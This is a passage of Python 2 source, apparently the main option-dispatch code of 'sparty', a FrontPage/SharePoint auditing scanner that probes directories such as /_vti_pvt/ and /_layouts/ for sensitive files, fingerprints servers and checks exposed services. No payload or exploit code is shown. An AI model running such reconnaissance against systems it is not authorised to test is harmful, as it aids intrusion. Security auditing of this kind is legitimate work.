module_success("module file upload check")
return
elif options.examples == "examples":
sparty_usage(target)
return
elif options.directory == "list" or options.directory == "index":
build_target(target,directory_check,dir_target)
print "\n[+]-----------------------------------------------------------------------!"
print "[+] auditing frontpage directory permissions (forbidden | index | not exist)!"
print "[+]-------------------------------------------------------------------------!\n"
audit(dir_target)
module_success("directory check")
return
elif options.frontpage == "bin":
build_target(target,front_bin,refine_target)
print "\n[+]----------------------------------------!"
print "[+] auditing frontpage '/_vti_bin/' directory!"
print "[+]------------------------------------------!\n"
audit(refine_target)
module_success("bin file access")
elif options.frontpage == "pvt":
build_target(target,front_pvt,pvt_target)
print "\n[+]---------------------------------------------------------!"
print "[+] auditing '/_vti_pvt/' directory for sensitive information !"
print "[+]-----------------------------------------------------------!\n"
audit(pvt_target)
module_success("pvt file access")
return
elif options.fingerprint == "ms_sharepoint":
dump_sharepoint_headers(target)
print "\n[+] sharepoint fingerprinting module completed !\n"
return
elif options.fingerprint == "ms_frontpage":
fingerprint_frontpage(target)
print "\n[+] frontpage fingerprinting module completed !\n"
return
elif options.sharepoint == "layouts":
build_target(target,sharepoint_check_layout,sharepoint_target_layout)
print "\n[+]-----------------------------------------------------------------!"
print "[+] auditing sharepoint '/_layouts/' directory for access permissions !"
print "[+]-------------------------------------------------------------------!\n"
audit(sharepoint_target_layout)
module_success("layout file access")
return
elif options.sharepoint == "forms":
build_target(target,sharepoint_check_forms,sharepoint_target_forms)
print "\n[+]--------------------------------------------------------------!"
print "[+] auditing sharepoint '/forms/' directory for access permissions !"
print "[+]----------------------------------------------------------------!\n"
audit(sharepoint_target_forms)
module_success("forms file access")
return
elif options.sharepoint == "catalog":
build_target(target,sharepoint_check_catalog,sharepoint_target_catalog)
print "\n[+]--------------------------------------------------------------!"
print "[+] auditing sharepoint '/catalog/' directory for access permissions !"
print "[+]----------------------------------------------------------------!\n"
audit(sharepoint_target_catalog)
module_success("catalogs file access")
return
elif options.services == "serv" or options.services == "services":
build_target(target,front_services,refine_target)
print "\n[+]---------------------------------------------------------------!"
print "[+] checking exposed services in the frontpage/sharepoint directory!"
print "[+]-----------------------------------------------------------------!\n"
audit(refine_target)
module_success("exposed services check")
else:
print "[-] please provide the proper scanning options!"
print "[+] check help (-h) for arguments and url specification!"
sys.exit(0)
except ValueError as v:
print "[-] ValueError occurred. Improper option argument or url!"
print "[+] check for help (-h) for more details!"
sys.exit(0)
except TypeError as t:
print "[-] TypeError occcured. Missing option argument or url!"
print "[+] check for help (-h) for more details!"
sys.exit(0)
except IndexError as e:
sparty_usage()
sys.exit(0)
except urllib2.HTTPError as h:
print "[-] HTTPError : %s" %h.code
print "[+] please specify the target with protocol handlers as http | https"
sys.exit(0)
except urllib2.URLError as u:
print "[-] URLError : %s" %u.args
print "[+] please specify the target with protocol handlers as http | https"
sys.exit(0)
except KeyboardInterrupt:
print "[-] halt signal detected, exiting the program !\n"
sys.exit(0)
except None:
print "[] Hey"
sys.exit(0)
# calling main
if __name__ =='__main__':
main()